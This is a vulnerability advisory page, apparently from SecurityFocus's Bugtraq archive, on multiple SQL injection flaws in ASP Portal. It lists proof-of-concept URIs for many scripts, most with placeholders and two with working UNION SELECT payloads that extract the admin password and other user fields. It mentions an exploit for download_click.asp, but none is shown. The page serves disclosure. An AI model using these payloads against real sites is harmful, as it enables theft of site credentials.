Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ASP Portal Multiple SQL Injection Vulnerabilities

This issue can be exploited via a web client.

The following proof of concept URI are available:
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=[SQLCode]
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='admin'
http://www.example.com/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin'
http://www.example.com/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode]
http://www.example.com/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode]
http://www.example.com/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode]
http://www.example.com/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode]
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode]
http://www.example.com/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode]
http://www.example.com/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2
http://www.example.com/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1
http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=1

An exploit is available for the download_click.asp issue:







 

Privacy Statement
Copyright 2009, SecurityFocus